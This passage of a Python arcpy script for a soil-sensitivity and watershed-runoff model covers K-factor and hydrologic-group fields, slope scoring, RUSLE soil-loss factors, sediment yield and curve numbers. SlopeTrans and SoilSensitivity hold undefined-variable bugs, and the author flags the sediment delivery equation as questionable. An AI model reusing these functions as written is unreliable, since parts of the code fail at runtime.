map (e.g., MUPOLYGON_VA for the data from Virginia). Alternatively, remove the layer once you are done with it, before adding the next one.\r\n - From the Soil Data Development Toolbox, gSSURGO Mapping Toolset, open the \"Create Soil Map\" tool\r\n - In the tool, set the following parameters:\r\n - Map Unit Layer: MUPOLYGON [or renamed layer]\r\n - SDV Folder = \"Soil Erosion Factors\"\r\n - SDV Attribute = \"K Factor, Whole Soil\"\r\n - Aggregation Method = \"Dominant Condition\"\r\n - Top Depth (cm) = \"0\"\r\n - Bottom Depth (cm) = \"10\"\r\n - Run the tool. A new layer symbolized on the K-factor will appear.\r\n - Repeat as needed for MUPOLYGON data from different databases. \r\n - Close ArcMap prior to attempting to run this function.\r\n \r\n The run of the above tool modifies the geodatabase by creating new tables with the prefix \"SDV_\". It does not modify existing tables.\r\n \r\n Given the above parameters, it creates a table named SDV_KfactWS_DCD_0to10, in which the field named KFACTWS_DCD contains the K-factor. If this is not the case, the function will fail.\r\n '''\r\n\r\n # Set up some variables\r\n mupolygon = in_GDB + os.sep + \"MUPOLYGON\"\r\n kfactTab = in_GDB + os.sep + \"SDV_KfactWS_DCD_0to10\"\r\n kfactFld = \"KFACTWS_DCD\"\r\n kMin = 0.02\r\n kMax = 0.69\r\n bname = os.path.basename(in_GDB)\r\n print(\"Working on %s\" %bname) \r\n \r\n # For some reason, the K-factor field created by the SSURGO toolbox is a string. \r\n # Convert to double since this is needed for correct rasterization later.\r\n print(\"Converting string to double...\")\r\n arcpy.AddField_management(kfactTab, \"kFactor\", \"DOUBLE\")\r\n expression = \"float(!%s!)\" %kfactFld\r\n arcpy.CalculateField_management (kfactTab, \"kFactor\", expression, 'PYTHON')\r\n kfactFld = \"kFactor\"\r\n \r\n # Process: Join K-factor value to MUPOLYGON\r\n # First check if field exists (due to prior processing) and delete if so\r\n fldList = arcpy.ListFields(mupolygon) \r\n fldNames = [f.name for f in fldList]\r\n if kfactFld in fldNames:\r\n print(\"Deleting existing K-factor field in MUPOLYGON...\")\r\n arcpy.DeleteField_management (mupolygon, kfactFld)\r\n print(\"Joining K-factor field to MUPOLYGON...\")\r\n arcpy.JoinField_management(mupolygon, \"MUKEY\", kfactTab, \"MUKEY\", kfactFld)\r\n \r\n # Replace nulls in the K-factor field with the value 0.30, per the OpenNSPECT Technical Guide.\r\n print(\"Replacing nulls in K-factor field...\")\r\n codeblock = '''def replaceNulls(fld):\r\n if fld == None:\r\n val = 0.3\r\n else:\r\n val = fld\r\n return val\r\n '''\r\n expression = \"replaceNulls(!%s!)\" %kfactFld\r\n arcpy.CalculateField_management (mupolygon, kfactFld, expression, 'PYTHON', codeblock)\r\n \r\n # Create a field in MUPOLYGON to store the erosion score value, and calculate\r\n print(\"Adding erosionScore field...\")\r\n arcpy.AddField_management(mupolygon, \"erosionScore\", \"SHORT\")\r\n \r\n print(\"Calculating erosionScore field...\")\r\n codeblock = '''def score(kfact, minThresh, maxThresh):\r\n if float(kfact) < minThresh:\r\n score = 0\r\n elif float(kfact) > maxThresh:\r\n score = 100\r\n else:\r\n score = 100*(float(kfact) - minThresh)/(maxThresh - minThresh)\r\n return score\r\n '''\r\n expression = \"score(!%s!,%s, %s)\" %(kfactFld, kMin, kMax)\r\n arcpy.CalculateField_management (mupolygon, \"erosionScore\", expression, 'PYTHON', codeblock)\r\n \r\n print(\"Mission complete for %s.\" %bname)\r\n\r\n return\r\n\r\ndef HydroGrp_vec(in_GDB):\r\n '''To the MUPOLYGON feature class, adds a field called \"HYDROLGRP_DCD\", containing the Hydrologic Soil Groups extracted from gSSURGO. Values range from A to D (with some compound classes possible, e.g., A/D). Also adds a field called \"HydroGrpNum\", which contains a numeric, simplified version of the hydrologic groups in which there are no compound groups and no nulls.\r\n \r\n This function modifies the input geodatabase by adding new tables and fields. It does not modify existing fields.\r\n \r\n Parameters:\r\n - in_GDB: input gSSURGO geodatabase\r\n \r\n Per OpenNSPECT guidance, numeric values for the groups are assigned as follows:\r\n - A = 1\r\n - B = 2\r\n - C = 3\r\n - D = 4\r\n \r\n Compound values (e.g., A/D) are assigned the latter group. Null values are assumed to be group D. \r\n \r\n IMPORTANT: Prior to running this function, new data must be created within the input geodatabase, using a tool in the Soil Data Development Toolbox. Tools in this toolbox can only be run from within ArcMap (not ArcPro) and I haven't figured out a way to automate this with a script, so you need to do it manually.\r\n \r\n The Soil Data Development Toolbox must be added to ArcToolbox in ArcMap, and is available from https://www.nrcs.usda.gov/wps/portal/nrcs/detail/soils/home/?cid=nrcs142p2_053628#tools.\r\n \r\n TO CREATE THE DATA NEEDED FOR THIS FUNCTION:\r\n - Within ArcMap, add the MUPOLYGON feature class as a layer. \r\n - NOTE: If you will be working on data from multiple databases, it is recommended that you rename the layer in the map (e.g., MUPOLYGON_VA for the data from Virginia). Alternatively, remove the layer once you are done with it, before adding the next one.\r\n - From the Soil Data Development Toolbox, gSSURGO Mapping Toolset, open the \"Create Soil Map\" tool\r\n - In the tool, set the following parameters:\r\n - Map Unit Layer: MUPOLYGON [or renamed layer]\r\n - SDV Folder = \"Soil Qualities and Features\"\r\n - SDV Attribute = \"Hydrologic Soil Group\"\r\n - Aggregation Method = \"Dominant Condition\"\r\n - Run the tool. A new layer symbolized on the Hydrologic Soil Group will appear.\r\n - Repeat as needed for MUPOLYGON data from different databases. \r\n - Close ArcMap prior to attempting to run this function.\r\n \r\n The run of the above tool modifies the geodatabase by creating new tables with the prefix \"SDV_\". It does not modify existing tables.\r\n \r\n Given the above parameters, it creates a table named SDV_HydrolGrp_DCD, in which the field named HYDROLGRP_DCD contains the Hydrologic Soil Group code. If this is not the case, the function will fail.\r\n '''\r\n\r\n # Set up some variables\r\n mupolygon = in_GDB + os.sep + \"MUPOLYGON\"\r\n hydroTab = in_GDB + os.sep + \"SDV_HydrolGrp_DCD\"\r\n hydroFld = \"HYDROLGRP_DCD\"\r\n bname = os.path.basename(in_GDB)\r\n print(\"Working on %s\" %bname) \r\n \r\n # Process: Join Hydrologic Group value to MUPOLYGON\r\n # First check if field exists (due to prior processing) and delete if so\r\n fldList = arcpy.ListFields(mupolygon) \r\n fldNames = [f.name for f in fldList]\r\n if hydroFld in fldNames:\r\n print(\"Deleting existing hydrologic group field in MUPOLYGON...\")\r\n arcpy.DeleteField_management (mupolygon, hydroFld)\r\n print(\"Joining Hydrologic Group field to MUPOLYGON...\")\r\n arcpy.JoinField_management(mupolygon, \"MUKEY\", hydroTab, \"MUKEY\", hydroFld)\r\n \r\n # Create and calculate a field in MUPOLYGON to store numeric version of hydrologic group, and calculate\r\n print(\"Adding numeric field for hydrologic group...\")\r\n arcpy.AddField_management(mupolygon, \"HydroGrpNum\", \"SHORT\")\r\n \r\n print(\"Calculating HydroGrpNum field...\")\r\n codeblock = '''def grpNum(fld):\r\n d = dict()\r\n d[\"A\"] = 1\r\n d[\"B\"] = 2\r\n d[\"C\"] = 3\r\n d[\"D\"] = 4\r\n \r\n if fld == None:\r\n key = \"D\"\r\n elif len(fld) > 1:\r\n key = fld[-1]\r\n else:\r\n key = fld \r\n \r\n val = d[key]\r\n \r\n return val\r\n '''\r\n expression = \"grpNum(!%s!)\" %hydroFld\r\n arcpy.CalculateField_management (mupolygon, \"HydroGrpNum\", expression, 'PYTHON', codeblock)\r\n \r\n print(\"Mission complete for %s.\" %bname)\r\n\r\n return\r\n\r\ndef SlopeTrans(in_Raster, inputType, transType, out_Trans, out_Slope, zfactor = 1):\r\n '''From a raster representing slope, creates a new raster representing a transformed representation of slope, depending on the transformation type (transType) specified. \r\n \r\n The transformation types that may be specified are:\r\n - TRUNCLIN: A truncated linear function. Flat and nearly level slopes less than or equal to 1 degree (~2%) are scored 0, extreme slopes greater than or equal to 30 degrees (~58%) are scored 100, and values are scaled linearly in between the threshold values. This is a modification of the transformation used to derived the Slope Score in the 2017 edition of the ConservationVision Watershed Model.\r\n - TRUNCSIN: A truncated sine function. The sine of the angle is multiplied by 200 to get the score, but values above 100 are truncated, which happens at 30 degrees.\r\n - RUSLE: A stepwise sine function used to derive the slope steepness factor (S) in the RUSLE equation. (See equations 4-4 and 4-5 on page 107 of the RUSLE handbook.)\r\n\r\n Parameters:\r\n - in_Raster: input raster representing slope or elevation\r\n - inputType: indicates whether the input raster is slope in degrees (DEG or DEGREES), slope as percent grade (PERC or PERCENT), or elevation (ELEV or ELEVATION)\r\n - transType: the transformation function used to produce the output raster\r\n permitted values: TRUNCLIN, TRUNCSIN, RUSLE\r\n - out_Trans: output raster representing transformed slope\r\n - out_Slope: output raster representing slope as percent grade (ignored if input is a slope raster)\r\n - zfactor: Number of ground x,y units in one surface z-unit (ignored if input is a slope raster)\r\n '''\r\n \r\n # Make sure user entered valid parameters, and report what they are. \r\n if inputType in (\"DEG\", \"DEGREES\"):\r\n slopeType = \"DEGREES\"\r\n print(\"Input is slope in degrees.\")\r\n elif inputType in (\"PERC\", \"PERCENT\"):\r\n slopeType = \"PERCENT\"\r\n print(\"Input is slope as percent grade.\")\r\n elif inputType in (\"ELEV\", \"ELEVATION\"):\r\n slopeType = \"PERCENT\"\r\n print(\"Input is elevation.\")\r\n else:\r\n print(\"Input type specification is invalid. Aborting.\")\r\n sys.exit()\r\n \r\n if transType == \"TRUNCLIN\":\r\n print(\"Appying the truncated linear transformation.\")\r\n elif transType == \"TRUNCSIN\":\r\n print(\"Applying the truncated sine transformation.\")\r\n elif transType == \"RUSLE\":\r\n print(\"Applying the RUSLE transformation to get the S-factor.\")\r\n else:\r\n print(\"Transformation specification is invalid. Aborting.\")\r\n sys.exit()\r\n \r\n # Set overwrite to be true \r\n arcpy.env.overwriteOutput = True\r\n \r\n # Set scratch output location\r\n scratchGDB = arcpy.env.scratchGDB\r\n \r\n # Identify the slope raster or create it if necessary\r\n if inputType in (\"ELEV\", \"ELEVATION\"):\r\n print(\"Calculating slope from elevation...\")\r\n in_Slope = Slope(in_Raster, \"PERCENT_RISE\", zfactor) \r\n in_Slope.save(out_Slope)\r\n else: \r\n in_Slope = Raster(in_Slope)\r\n \r\n if transType == \"TRUNCLIN\":\r\n # Set flat and nearly level slopes (LTE 1 degree) to 0. Set extreme slopes (GTE 30 degrees) to 100. Use linear function to scale between those values.\r\n minSlope = 1.0\r\n maxSlope = 30.0\r\n if slopeType == \"PERCENT\":\r\n print(\"Calculating score...\")\r\n minSlope = 100*math.tan(minSlope*math.pi/180)\r\n maxSlope = 100*math.tan(maxSlope*math.pi/180)\r\n outRaster = Con(in_Slope <= minSlope, 0, Con((in_Slope > maxSlope), 100, 100 * (in_Slope - minSlope) / (maxSlope - minSlope)))\r\n else: \r\n print(\"Calculating score...\")\r\n outRaster = Con(in_Slope <= minSlope, 0, Con((in_Slope > maxSlope), 100, 100 * (in_Slope - minSlope) / (maxSlope - minSlope)))\r\n \r\n elif transType == \"TRUNCSIN\":\r\n # Take the sine, multiply by 200, and integerize. Upper values are truncated at 100 (which happens at 30 degrees).\r\n if slopeType == \"PERCENT\":\r\n print(\"Converting percent grade to radians and calculating score...\")\r\n outRaster = Min(100, Int(0.5 + 200*Sin(ATan(in_Slope/100))))\r\n else: \r\n print(\"Converting degrees to radians and calculating score...\")\r\n outRaster = Min(100, Int(0.5 + 200*Sin(in_Slope * math.pi/180.0)))\r\n \r\n else:\r\n # Use RUSLE transformation equations\r\n inflect = 9.0\r\n if slopeType == \"PERCENT\":\r\n print(\"Converting percent grade to radians and calculating S-factor...\")\r\n outRaster = Con(in_Slope < inflect, (10.8*(Sin(ATan(in_Slope/100))) + 0.03), (16.8*(Sin(ATan(in_Slope/100))) - 0.50))\r\n else: \r\n inflect = math.atan(inflect/100)*180/math.pi\r\n print(\"Converting degrees to radians and calculating S-factor...\")\r\n outRaster = Con(in_Slope < inflect, (10.8*(Sin(in_Slope * math.pi/180.0)) + 0.03), (16.8*(Sin(in_Slope * math.pi/180.0)) - 0.50))\r\n \r\n print(\"Saving output...\")\r\n outRaster.save(out_Trans)\r\n \r\n print(\"Mission complete\")\r\n \r\n return\r\n\r\ndef SoilSensitivity(in_runoffScore, in_erosionScore, in_SlopeScore, out_SoilSens):\r\n '''From rasters representing scores for slope, runoff potential, and erosion potential, creates a raster representing soil sensitivity, ranging from 0 (low sensitivity) to 100 (high sensitivity; i.e. where land use practices will have the most impact, for better or worse). This is the Soil Sensitivity Score from the Watershed Model. Inputs must have been first generated by previous functions to produce the input rasters. \r\n \r\n This functions assumes all inputs are in the same coordinate system and properly aligned with each other.\r\n\r\n Parameters:\r\n - in_RunoffScore: input raster representing runoff score\r\n - in_ErosionScore: input raster representing erosion score\r\n - in_SlopeScore: input raster representing slope score\r\n - out_SoilSens: output raster representing soil sensitivity\r\n '''\r\n \r\n # Set overwrite to be true \r\n arcpy.env.overwriteOutput = True\r\n \r\n # Calculate soil sensitivity as average of three inputs, integerized\r\n print(\"Calculating soil sensitivity score...\")\r\n sens = Int(0.5 + (in_RunoffScore + in_ErosionScore + in_SlopeScore)/float(3))\r\n \r\n print(\"Saving output...\")\r\n sens.save(out_SoilSens)\r\n \r\n print(\"Mission complete.\")\r\n \r\ndef soilLoss_RKS(in_Rfactor, in_Kfactor, in_Sfactor, out_RKS):\r\n '''Multiplies the rasters representing three of the factors in the Revised Universal Soil Loss Equation (RUSLE), to produce a relative measure of the propensity for soil loss. Does not include the cover management (C), slope length (L), or the supporting practices (P) factors. Inputs must have been first generated by previous functions to produce the input rasters. \r\n \r\n NOTE: The output can be multiplied by the year-specific C-factor (which depends on land cover) to obtain a relative measure of soil loss propensity. The output can be multiplied by a constant C-factor to obtain best-case and worst-case scenarios.\r\n \r\n This functions assumes all inputs are in the same coordinate system and properly aligned with each other.\r\n\r\n Parameters:\r\n - in_Rfactor: input raster representing the rainfall/runoff erosivity factor\r\n - in_Kfactor: input raster representing the soil erodibility factor\r\n - in_Sfactor: input raster representing the slope steepness factor\r\n - out_SoilSens: output raster representing soil sensitivity\r\n '''\r\n \r\n # Set overwrite to be true \r\n arcpy.env.overwriteOutput = True\r\n \r\n # Calculate propensity for soil loss by multiplying the factors\r\n print(\"Calculating propensity for soil loss...\")\r\n R = Raster(in_Rfactor)\r\n K = Raster(in_Kfactor)\r\n S = Raster(in_Sfactor)\r\n RKS = R*K*S\r\n \r\n print(\"Saving output...\")\r\n RKS.save(out_RKS)\r\n \r\n print(\"Mission complete.\")\r\n\r\ndef soilLoss_RKSC(in_RKS, in_Cfact, out_RKSC):\r\n '''Produces a raster representing relative soil loss, based on the RUSLE R-, K-, S-, and C-factors.\r\n \r\n Parameters:\r\n - in_Raster: input raster respresenting product of the RUSLE factors RKS\r\n - in_Cfact: input raster or constant (float) representing the RUSLE C-factor\r\n - out_RKSC: output raster respresenting product of the RUSLE factors RKSC\r\n '''\r\n \r\n # Set overwrite to be true \r\n arcpy.env.overwriteOutput = True\r\n \r\n # Set up some variables\r\n in_RKS = Raster(in_RKS)\r\n try:\r\n in_Cfact = Raster(in_Cfact)\r\n except:\r\n pass\r\n \r\n # Perform calculation\r\n print(\"Multiplying RKS by C-factor...\")\r\n RKSC = in_RKS*in_Cfact\r\n print(\"Saving...\")\r\n RKSC.save(out_RKSC)\r\n \r\n print(\"Mission accomplished.\")\r\n\r\ndef SedYld(in_Raster, in_CurvNum, nameTag, in_Slope, out_GDB, in_Cfact = \"NONE\", sdrType = \"STD\", cellArea = 0.0001):\r\n '''Produces a raster representing the annual sediment yield.\r\n \r\n NOTE: The \"standard\" calculation for Sediment Delivery Ratio SDR is from the OpenNSPECT tech manual. I also tracked down the original paper from 1977. The equation was developed for a specific area and it is highly questionable that it should be applied anywhere else. I'm also not sure I'm using percent slope correctly to obtain ZL, the relief-length ratio. Because of my doubts about the whole thing, I developed a much simpler equation for a proxy \"alternate\" SDR. I don't assume any particular units can be assigned to the final sediment yield; I view both RKSC (the product of the RUSLE soil loss factors) and the final sediment yield to be relative measures only. I also left out the L-factor in RUSLE soil loss equation b/c it is difficult to calculate and maybe (probably?) not worth it.\r\n \r\n This function assumes all inputs are in the same coordinate system and properly aligned with each other.\r\n\r\n Parameters:\r\n - in_Raster: input raster respresenting product of the RUSLE factors, RKSC or RKS\r\n - in_CurvNum: input raster or constant (integer) representing the SCS curve number\r\n - nameTag: tag to add to basenames (land cover year or a scenario-based tag)\r\n - in_Slope: input raster representing percent slope\r\n - out_GDB: geodatabase to store outputs\r\n - in_Cfact: input raster or constant (float) representing the RUSLE C-factor. Enter \"NONE\" if in_Raster is RKSC (i.e., C-factor already included)\r\n - sdrType: Type of SDR to calculate: STD (standard) or ALT (alternate)\r\n - cellArea: area of cells in Curve Number raster, in square kilometers; ignored if using alternate method for SDR calculation\r\n '''\r\n \r\n # Set overwrite to be true \r\n arcpy.env.overwriteOutput = True\r\n \r\n # Set up some variables\r\n out_RKSC = out_GDB + os.sep + \"RKSC_%s\" %nameTag\r\n if sdrType == \"STD\":\r\n out_SDR = out_GDB + os.sep + \"SDR_%s\" %nameTag\r\n out_SedYld = out_GDB + os.sep + \"SedYld_%s\" %nameTag\r\n else:\r\n out_SDR = out_GDB + os.sep + \"altSDR_%s\" %nameTag\r\n out_SedYld = out_GDB + os.sep + \"altSedYld_%s\" %nameTag\r\n\r\n try:\r\n in_CurvNum = Raster(in_CurvNum)\r\n except:\r\n pass\r\n \r\n in_Slope = Raster(in_Slope)\r\n in_Raster = Raster(in_Raster)\r\n \r\n # Perform calculations\r\n if in_Cfact == \"NONE\":\r\n print(\"Input raster is RKSC...\")\r\n RKSC = in_Raster\r\n else:\r\n print(\"Input raster is RKS; multiplying by C-factor...\")\r\n try:\r\n in_Cfact = Raster(in_Cfact)\r\n except:\r\n pass\r\n RKSC = in_Raster*in_Cfact\r\n print(\"Saving...\")\r\n RKSC.save(out_RKSC)\r\n \r\n if sdrType == \"STD\":\r\n print(\"Calculating standard sediment delivery ratio...\")\r\n print(\"Calculating constant Alpha...\")\r\n Alpha = 1.366*10**(-11)\r\n \r\n print(\"Calculating drainage area factor...\")\r\n D = cellArea**(-0.0998)\r\n \r\n print(\"Calculating slope factor...\")\r\n Z = (in_Slope/100000.0)**0.3629 \r\n \r\n print(\"Calculating curve number factor...\")\r\n N = in_CurvNum**5.444 # This may be a raster or a constant depending on input type\r\n \r\n print(\"Calculating sediment delivery ratio...\")\r\n SDR = Alpha*D*Z*N\r\n \r\n else:\r\n print(\"Calculating alternate sediment delivery ratio...\")\r\n # Adjust slope values prior to multiplying\r\n adjSlope = Con(in_Slope > 100, 1.0, in_Slope/100.0)\r\n SDR = adjSlope*in_CurvNum/100.0\r\n \r\n print(\"Saving...\")\r\n SDR.save(out_SDR)\r\n \r\n print(\"Calculating sediment yield...\")\r\n sedYld = RKSC*SDR\r\n print(\"Saving...\")\r\n sedYld.save(out_SedYld)\r\n \r\n print(\"Mission accomplished.\") \r\n\r\ndef coeffNSPECT(in_LC, coeffType, out_Coeff):\r\n '''From an input land cover raster, creates a new raster representing the NSPECT coefficient type specified (coeffType). Coefficient values are from the OpenNSPECT Technical Guide. The land cover codes in that table are CCAP codes, so assignments in this function are to the equivalent NLCD codes. \r\n \r\n The coefficients that may be specified are:\r\n - CFACT: The cover factor (C-Factor in the RUSLE equation; a unitless ratio)\r\n - NPOLL: Nitrogen pollution factor (mg/L)\r\n - PPOLL: Phosphorus pollution factor (mg/L)\r\n - SPOLL: Suspended solids pollution factor (mg/L)\r\n \r\n C-factor values are assigned to land cover classes as specified in Table 4, page 22 of the OpenNSPECT Technical Guide. The pollution coefficients are specified in Appendix A, pages 42-43.\r\n \r\n This function modifies the input land cover attribute table, by adding and calculating a new field to store the desired coefficients.\r\n\r\n Parameters:\r\n - in_LC: Input classified land cover raster, using standard NLCD land cover codes (updated with CCAP for code 32 = unconsolidated shore)\r\n - coeffType: The coefficient set used to produce the output\r\n - out_Coeff: Output raster representing specified coefficient values\r\n '''\r\n \r\n # Make sure user entered valid parameters, and report what they are. \r\n if coeffType not in (\"CFACT\", \"NPOLL\", \"PPOLL\", \"SPOLL\"):\r\n print(\"Input coefficient type specification is invalid. Aborting.\")\r\n sys.exit()\r\n \r\n # Set overwrite to be true \r\n arcpy.env.overwriteOutput = True\r\n \r\n # Initialize empty data dictionary\r\n d = dict()\r\n \r\n if coeffType == \"NPOLL\":\r\n fldName = \"Nitrogen\"\r\n msg = \"Adding field to store nitrogen pollution values...\"\r\n # Nitrogen pollution dictionary\r\n d[11] = 0.00\r\n d[21] = 1.25\r\n d[22] = 1.77\r\n d[23] = 2.29\r\n d[24] = 2.22\r\n d[31] = 0.97\r\n d[32] = 0.97\r\n d[41] = 1.25\r\n d[42] = 1.25\r\n d[43] = 1.25\r\n d[52] = 1.25\r\n d[71] = 1.25\r\n d[81] = 2.48\r\n d[82] = 2.68\r\n d[90] = 1.10\r\n d[95] = 1.10\r\n \r\n elif coeffType == \"PPOLL\":\r\n fldName = \"Phosphorus\"\r\n msg = \"Adding field to store phosphorus pollution values...\"\r\n # Phosphorus pollution dictionary\r\n d[11] = 0.00\r\n d[21] = 0.05\r\n d[22] = 0.18\r\n d[23] = 0.30\r\n d[24] = 0.47\r\n d[31] = 0.12\r\n d[32] = 0.12\r\n d[41] = 0.05\r\n d[42] = 0.05\r\n d[43] = 0.05\r\n d[52] = 0.05\r\n d[71] = 0.05\r\n d[81] = 0.48\r\n d[82] = 0.42\r\n d[90] = 0.20\r\n d[95] = 0.20 \r\n \r\n elif coeffType == \"SPOLL\":\r\n fldName = \"Solids\"\r\n msg = \"Adding field to store suspended solids pollution values...\"\r\n # Suspended solids pollution dictionary\r\n d[11] = 0.00\r\n d[21] = 11.10\r\n d[22] = 19.10\r\n d[23] = 27.00\r\n d[24] = 71.00\r\n d[31] = 70.00\r\n d[32] = 70.00\r\n d[41] = 11.10\r\n d[42] = 11.10\r\n d[43] = 11.10\r\n d[52] = 11.10\r\n d[71] = 55.30\r\n d[81] = 55.30\r\n d[82] = 107.00\r\n d[90] = 19.00\r\n d[95] = 19.00 \r\n \r\n else:\r\n fldName = \"Cfactor\"\r\n msg = \"Adding field to store C-factor values...\"\r\n # C-factor dictionary\r\n d[11] = 0.000\r\n d[21] = 0.005\r\n d[22] = 0.030\r\n d[23] = 0.010\r\n d[24] = 0.000\r\n d[31] = 0.700\r\n d[32] = 0.500\r\n d[41] = 0.009\r\n d[42] = 0.004\r\n d[43] = 0.007\r\n d[52] = 0.014\r\n d[71] = 0.120\r\n d[81] = 0.005\r\n d[82] = 0.240\r\n d[90] = 0.003\r\n d[95] = 0.003\r\n \r\n # Create and calculate a coefficient field in the land cover attribute table\r\n print(msg)\r\n arcpy.AddField_management(in_LC, fldName, \"DOUBLE\")\r\n \r\n print(\"Calculating field...\")\r\n codeblock = '''def coeff(code, dic):\r\n try: \r\n val = dic[code]\r\n except:\r\n val = 0\r\n return val\r\n '''\r\n expression = \"coeff(!VALUE!, %s)\" %d\r\n arcpy.CalculateField_management (in_LC, fldName, expression, 'PYTHON', codeblock)\r\n \r\n # Create a new raster from the coefficient field, and save\r\n print(\"Creating raster...\")\r\n outRaster = Lookup(in_LC, fldName)\r\n \r\n print(\"Saving output...\")\r\n outRaster.save(out_Coeff)\r\n \r\n print(\"Mission complete.\")\r\n \r\ndef curvNum(in_LC, in_HydroGrp, out_CN):\r\n '''Given input land cover and hydrologic group, produces output raster representing runoff curve numbers.\r\n \r\n Curve numbers are assigned to combinations of land cover and soil types as specified in Table 1, page 6 of the OpenNSPECT Technical Guide. \r\n \r\n This function modifies the input land cover attribute table, by adding and calculating a new field to store the curve numbers\r\n\r\n Parameters:\r\n - in_LC: Input classified land cover raster, using standard NLCD land cover codes (updated with CCAP for code 32 = unconsolidated shore), OR an integer representing a desired land cover class\r\n - in_HydroGrp: Input raster representing hydrologic groups (integer values must range from 1 = A to 4 = D)\r\n - out_CN: Output raster representing runoff curve numbers\r\n '''\r\n \r\n # Set overwrite to be true \r\n arcpy.env.overwriteOutput = True\r\n \r\n # Set scratch output location\r\n scratchGDB = arcpy.env.scratchGDB\r\n \r\n # Initialize empty data dictionaries\r\n dictA = dict()\r\n dictB = dict()\r\n dictC = dict()\r\n dictD = dict()\r\n m = dict()\r\n \r\n # Populate dictionary for hydro group A, then append to list\r\n dictA[11] = 0\r\n dictA[21] = 49\r\n dictA[22] = 61\r\n dictA[23] = 77\r\n dictA[24] = 89\r\n dictA[31] = 77\r\n dictA[32] = 0\r\n dictA[41] = 30\r\n dictA[42] = 30\r\n dictA[43] = 30\r\n dictA[52] = 30\r\n dictA[71] = 30\r\n dictA[81] = 39\r\n dictA[82] = 67\r\n dictA[90] = 0\r\n dictA[95] = 0\r\n m[\"A\"] = dictA\r\n \r\n # Populate dictionary for hydro group B\r\n dictB[11] = 0\r\n dictB[21] = 69\r\n dictB[22] = 75\r\n dictB[23] = 85\r\n dictB[24] = 92\r\n dictB[31] = 86\r\n dictB[32] = 0\r\n dictB[41] = 55\r\n dictB[42] = 55\r\n dictB[43] = 55\r\n dictB[52] = 48\r\n dictB[71] = 58\r\n dictB[81] = 61\r\n dictB[82] = 78\r\n dictB[90] = 0\r\n dictB[95] = 0\r\n m[\"B\"] = dictB\r\n \r\n # Populate dictionary for hydro group C\r\n dictC[11] = 0\r\n dictC[21] = 79\r\n dictC[22] = 83\r\n dictC[23] = 90\r\n dictC[24] = 94\r\n dictC[31] = 91\r\n dictC[32] = 0\r\n dictC[41] = 70\r\n dictC[42] = 70\r\n dictC[43] = 70\r\n dictC[52] = 65\r\n dictC[71] = 71\r\n dictC[81] = 74\r\n dictC[82] = 85\r\n dictC[90] = 0\r\n dictC[95] = 0\r\n m[\"C\"] = dictC\r\n \r\n # Populate dictionary for hydro group D\r\n dictD[11] = 0\r\n dictD[21] = 84\r\n dictD[22] = 87\r\n dictD[23] = 92\r\n dictD[24] = 95\r\n dictD[31] = 94\r\n dictD[32] = 0\r\n dictD[41] = 77\r\n dictD[42] = 77\r\n dictD[43] = 77\r\n dictD[52] = 73\r\n dictD[71] = 78\r\n dictD[81] = 80\r\n dictD[82] = 89\r\n dictD[90] = 0\r\n dictD[95] = 0\r\n m[\"D\"] = dictD\r\n \r\n hydroGrps = [\"A\", \"B\", \"C\", \"D\"]\r\n in_HydroGrp = Raster(in_HydroGrp)\r\n \r\n if type(in_LC) == str:\r\n # Create and calculate curve number fields in the land cover attribute table\r\n for grp in hydroGrps: \r\n fldName = \"cn_%s\" %grp\r\n d = m[grp]\r\n \r\n fldList = arcpy.ListFields(in_LC) \r\n fldNames = [f.name for f in fldList]\r\n if fldName in fldNames:\r\n print(\"Deleting existing field %s...\" %fldName)\r\n arcpy.DeleteField_management (in_LC, fldName)\r\n \r\n print(\"Adding field %s...\" %fldName)\r\n arcpy.AddField_management(in_LC, fldName, \"SHORT\")\r\n \r\n print(\"Calculating field...\")\r\n codeblock = '''def curvnum(code, dic):\r\n try:\r\n cn = dic[code]\r\n except:\r\n cn = 0\r\n return cn\r\n '''\r\n expression = \"curvnum(!VALUE!, %s)\" %d\r\n arcpy.CalculateField_management (in_LC, fldName, expression, 'PYTHON', codeblock)\r\n \r\n # Create a new raster from the curve number fields, based on soil type\r\n print(\"Creating curve number raster...\")\r\n outRaster = Con(in_HydroGrp == 1, Lookup(in_LC, \"cn_A\"), Con(in_HydroGrp == 2, Lookup(in_LC, \"cn_B\"), Con(in_HydroGrp == 3, Lookup(in_LC, \"cn_C\"),Con(in_HydroGrp == 4, Lookup(in_LC, \"cn_D\")))))\r\n \r\n else:\r\n # Use the specified land cover constant with soil type to get the curve number\r\n outRaster = Con(in_HydroGrp == 1, dictA[in_LC], Con(in_HydroGrp == 2, dictB[in_LC], Con(in_HydroGrp == 3, dictC[in_LC],Con(in_HydroGrp == 4, dictD[in_LC]))))\r\n \r\n print(\"Saving output...\")\r\n outRaster.save(out_CN)\r\n \r\n print(\"Mission complete.\")\r\n\r\ndef eventRunoff(in_Raster, in_Rain, out_GDB, yearTag, cellArea = 1000000, inputType = \"CN\", convFact = 1):\r\n '''Produces an output raster representing event-based runoff volume in Liters\r\n \r\n Parameters:\r\n - in_Raster: input raster representing curve numbers OR maximum retention\r\n - in_Rain: input constant or raster representing rainfall\r\n - out_GDB: geodatabase for storing outputs\r\n - yearTag: tag to add to basenames to indicate land cover year determining curve numbers \r\n - cellArea: area of cells in Curve Number raster, in square centimeters\r\n - inputType: indicates whether in_Raster is curve numbers (CN) or retention (RET)\r\n - convFact: conversion factor to convert input rainfall depth units to inches\r\n '''\r\n # Set overwrite to be true \r\n arcpy.env.overwriteOutput = True\r\n \r\n # Set scratch output location\r\n scratchGDB = arcpy.env.scratchGDB\r\n \r\n # Set up some variables\r\n in_Raster = Raster(in_Raster)\r\n try:\r\n in_Rain = Raster(in_Rain)\r\n except:\r\n pass\r\n out_Retention = out_GDB + os.sep + \"Retention_%s\" %yearTag\r\n out_runoffDepth = out_GDB + os.sep + \"runoffDepth_%s\" %yearTag\r\n out_runoffVolume = out_GDB + os.sep + \"runoffVol_%s\" %yearTag\r\n out_accumRunoff = out_GDB + os.sep + \"accRunoff_%s\" %yearTag\r\n\r\n # Perform calculations\r\n # Result could be raster or a constant depending on input\r\n if convFact != 1:\r\n rain = convFact*in_Rain \r\n else:\r\n rain = in_Rain\r\n \r\n if inputType == \"CN\":\r\n print(\"Calculating maximum retention...\")\r\n # Have to deal with division by zero here.\r\n retention = Con(in_Raster == 0, 1000, ((float(1000)/in_Raster) - 10))\r\n print(\"Saving...\")\r\n retention.save(out_Retention)\r\n else:\r\n retention = in_Raster\r\n \r\n print(\"Calculating runoff depth (inches)...\")\r\n # Set runoff depth to zero if rainfall is less than initial abstraction\r\n runoffDepth = Con((rain - 0.2*retention) > 0,(rain - 0.2*retention)**2/(rain + 0.8*retention),0)\r\n print(\"Saving...\")\r\n runoffDepth.save(out_runoffDepth)\r\n 